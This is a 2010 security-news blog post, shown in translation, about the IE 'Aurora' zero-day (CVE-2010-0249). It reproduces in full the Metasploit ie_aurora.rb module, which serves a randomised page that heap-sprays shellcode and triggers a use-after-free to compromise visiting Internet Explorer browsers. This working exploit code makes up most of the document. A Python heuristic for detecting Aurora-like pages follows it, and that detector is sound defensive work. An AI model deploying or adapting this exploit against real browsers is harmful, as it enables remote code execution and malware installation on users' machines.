Microsoft confirms: first critical IE vulnerability of the new year, large-scale drive-by (挂马) attacks imminent (Part 2)

(2010-01-20 12:23:45)

Tags: ie, critical vulnerability, Aurora zero-day, drive-by trojan planting (挂马), WebShield (网盾), vulnerability, Shi Xiaohong, Dapu Buwan

Category: Information Security

[Summary] On January 14 Microsoft confirmed the first critical IE 0-day of the new year (the IE DOM 0-day), which affects almost every version of Internet Explorer. Microsoft has not yet released an official patch, yet exploit code for the vulnerability has already begun to spread online; the leaked code is expected to trigger large-scale drive-by (挂马) web attacks in the coming days.

In recent days several security vendors worldwide issued simultaneous alerts publishing details of the latest Microsoft IE DOM 0-day (the Aurora zero-day). As details of the vulnerability continued to be disclosed, complete malicious exploit code based on it has now appeared online. Because Microsoft has not yet released a security patch, some enterprises and users are worried about being attacked through it. Kingsoft's security experts believe that, because the vulnerability triggers very reliably, it is likely to be exploited on a large scale in the near future, and they remind users to take precautions.

Reportedly, exploit code for the IE DOM 0-day (Aurora zero-day) appeared on January 13. The next day Microsoft headquarters issued a security advisory alerting users to the IE DOM 0-day (Aurora zero-day), and on the evening of January 14 it announced that attackers had used the IE zero-day (advisory number 979352) in the recent attacks on Google, Adobe and other companies. The same day, Kingsoft's security experts began tracking the IE DOM 0-day (Aurora zero-day) closely. On January 15, international security vendors disclosed that exploit code had been published online; at the same time, Kingsoft's security experts captured the exploit code and confirmed by analysis that Kingsoft WebShield's four-layer interception can block the vulnerability's final execution stage.

Internet Explorer CVE-2010-0249 remote code execution vulnerability

##
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "8.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :vuln_test  => nil, # no way to test without just trying it
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
      'Description'    => %q{
        This module exploits a memory corruption flaw in Internet Explorer. This
        flaw was found in the wild.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'unknown',
          'hdm'      # Metasploit port
        ],
      'Version'        => '$Revision: 8136 $',
      'References'     =>
        [
          ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
          ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
          'Compat'   =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => 'Jan 14 2009', # wepawet sample
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    # Serve a 1x1 transparent GIF for the image whose onload handler starts the trigger
    if (request.uri.match(/\.gif/i))
      data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
      send_response(cli, data, { 'Content-Type' => 'image/gif' })
      return
    end

    # Identifier names used in the generated page are randomised per request
    var_memory    = rand_text_alpha(rand(100) + 1)
    var_boom      = rand_text_alpha(rand(100) + 1)
    var_x1        = rand_text_alpha(rand(100) + 1)
    var_e1        = rand_text_alpha(rand(100) + 1)
    var_e2        = rand_text_alpha(rand(100) + 1)
    var_comment   = rand_text_alpha(rand(100) + 1)
    var_abc       = rand_text_alpha(3)
    var_ev1       = rand_text_alpha(rand(100) + 1)
    var_ev2       = rand_text_alpha(rand(100) + 1)
    var_sp1       = rand_text_alpha(rand(100) + 1)
    var_unescape  = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)
    var_spray     = rand_text_alpha(rand(100) + 1)
    var_start     = rand_text_alpha(rand(100) + 1)
    var_i         = rand_text_alpha(rand(100) + 1)
    rand_html     = rand_text_english(rand(400) + 500)

    html = %Q|<html>
<head>
<script>
  var #{var_comment} = "COMMENT";
  var #{var_x1} = new Array();
  for (i = 0; i < 200; i ++ ){
    #{var_x1}[i] = document.createElement(#{var_comment});
    #{var_x1}[i].data = "#{var_abc}";
  };
  var #{var_e1} = null;
  var #{var_memory} = new Array();
  var #{var_unescape} = unescape;
  function #{var_boom}() {
    var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
    var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
    do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
    for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
  }
  function #{var_ev1}(evt){
    #{var_boom}();
    #{var_e1} = document.createEventObject(evt);
    document.getElementById("#{var_sp1}").innerHTML = "";
    window.setInterval(#{var_ev2}, 50);
  }
  function #{var_ev2}(){
    p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
    for (i = 0; i < #{var_x1}.length; i ++ ){
      #{var_x1}[i].data = p;
    }
    var t = #{var_e1}.srcElement;
  }
</script>
</head>
<body>
<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span>
</body>
</html>
|

    # Transmit the response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end
end
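The trigger page generated by the module above has three recognisable parts regardless of its randomised names: a batch of COMMENT nodes whose data is rewritten, an event object that outlives the element it came from (freed via innerHTML = "" and touched again through srcElement), and a 0x0c0d heap spray assembled from one-character string fragments. As an added example that is not part of the original post or of the Metasploit module, the following Python heuristic flags pages carrying that combination; the two sample pages and the indicator names are constructed for illustration, and the string-concatenation folding is a heuristic normalisation so the split-up spray literal is not missed.

```python
import re

# Constructed sample shaped like the Aurora trigger above: randomised names, COMMENT nodes,
# a 0x0c0d spray assembled from one-character fragments, and the event-object use-after-free.
AURORA_LIKE = r'''<html><head><script>
var cm = "COMMENT"; var qzx = new Array();
for (i = 0; i < 200; i++) { qzx[i] = document.createElement(cm); qzx[i].data = "abc"; }
var e1 = null; var mem = new Array(); var u = unescape;
function boom() {
  var sc = u('%u9090%u9090');
  var sp = u("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
  do { sp += sp } while (sp.length < 0xd0000);
  for (j = 0; j < 100; j++) mem[j] = sp + sc;
}
function ev1(evt) { boom(); e1 = document.createEventObject(evt);
  document.getElementById("s").innerHTML = ""; window.setInterval(ev2, 50); }
function ev2() { for (i = 0; i < qzx.length; i++) qzx[i].data = "\u0c0d\u0c0d"; var t = e1.srcElement; }
</script></head><body><span id="s"><img src="x.gif" onload="ev1(event)"></span></body></html>'''

# Constructed benign page: clears a node via innerHTML and concatenates strings, but has no spray or event reuse.
BENIGN = '<html><body><script>var a = document.getElementById("x"); a.innerHTML = ""; a.innerHTML = "<b>" + "hi" + "</b>";</script></body></html>'

_CONCAT = re.compile(r'(["\'])((?:(?!\1).)*)\1\s*\+\s*(["\'])((?:(?!\3).)*)\3')

def fold_concat(js):
    """Collapse "a" + "b" chains into one literal (heuristic normalisation): the module splits
    the spray string into single characters, so a plain search for %u0c0d would miss it."""
    prev = None
    while prev != js:
        prev = js
        js = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', js)
    return js

# Each indicator (hypothetical names) is a list of patterns that must all match the page.
INDICATORS = {
    "spray_0c0d":    [re.compile(r'%u0c0d%u0c0d|\\u0c0d\\u0c0d', re.I)],
    "spray_grow":    [re.compile(r'do\s*\{[^}]*\+=[^}]*\}\s*while\s*\([^)]*\.length\s*<\s*0x[0-9a-f]{4,}', re.I)],
    "uaf_event":     [re.compile(r'createEventObject\s*\(.*?innerHTML\s*=\s*(["\'])\1.*?\.srcElement', re.S)],
    "comment_nodes": [re.compile(r'["\']COMMENT["\']', re.I), re.compile(r'createElement\s*\('), re.compile(r'\.data\s*=')],
}

def scan(html):
    """Return the sorted names of the indicators that fire on a page."""
    src = fold_concat(html)
    return sorted(name for name, pats in INDICATORS.items() if all(p.search(src) for p in pats))

def is_aurora_like(html):
    """Flag a page only when the freed-event-object pattern coincides with a spray indicator."""
    hits = scan(html)
    return "uaf_event" in hits and ("spray_0c0d" in hits or "spray_grow" in hits)
```

Because the patterns key on DOM API names and the spray constant rather than on variable names, renaming the identifiers per request (as the module does) does not evade the check, whereas a page that merely clears a node with innerHTML produces no hits.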

As the only domestic member of Microsoft's VIA alliance, Kingsoft's security experts consider the impact of the Microsoft IE DOM 0-day to be enormous: the vulnerability is already being exploited by attackers and can be used to spread trojans on a large scale, and users who visit a website carrying the exploit face a serious security threat. (Dapu Buwan)
